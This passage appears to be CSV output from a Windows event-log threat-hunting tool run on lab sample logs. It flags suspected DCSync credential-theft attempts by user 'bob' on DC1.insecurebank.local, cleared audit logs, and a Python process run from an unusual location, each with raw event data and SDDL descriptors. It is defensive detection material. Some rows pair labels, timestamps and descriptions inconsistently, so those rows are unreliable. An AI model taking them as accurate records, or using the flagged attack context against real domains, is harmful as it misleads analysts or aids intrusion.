;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Audit log cleared,1639331872.272432,2021-12-12T21:57:52.272432+04:00,,Audit,Critical,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 
2982081 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x364f7 + + +",01566s-win16-ir.threebeesco.com,Security +Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242595 + + + + + Security + DC1.insecurebank.local + + + + + AF3067E0-BB6F-47C2-AA20-F3F458797F38 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-418912183
0-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;
CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1557594610.60807,2020-09-02T15:47:48.570502+04:00,,Audit,Critical,"User Name : ( IEUser ) with process : ( C:\Python27\python.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 18196 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x13765 + 0x4f0 + C:\Python27\python.exe + %%1938 + 0x12c + + +",01566s-win16-ir.threebeesco.com,Security +Process running in Unusual location,1599047268.570502,2019-05-11T21:10:10.608070+04:00,,Threat,High,Audit log cleared by user ( a-jbrown ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 2171289 + + + + + Security + 01566s-win16-ir.threebeesco.com + + + + + + S-1-5-21-308926384-506822093-3341789130-1106 + a-jbrown + 3B + 0x38a14 + + +",IEWIN7,Security +Dcsync Attack detected,1553549341.035686,2019-03-26T01:29:01.035686+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242605 + + + + + Security + DC1.insecurebank.local + + + + + 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + 
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a
0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 
0 + 4 + 104 + 0 + 0x4020000000000000 + + + 18195 + + + + + Security + IEWIN7 + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + + +",IEWIN7,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242604 + + + + + Security + DC1.insecurebank.local + + + + + 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121
)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRP
WPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242603 + + + + + Security + DC1.insecurebank.local + + + + + 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + 
O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fd
a78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f8036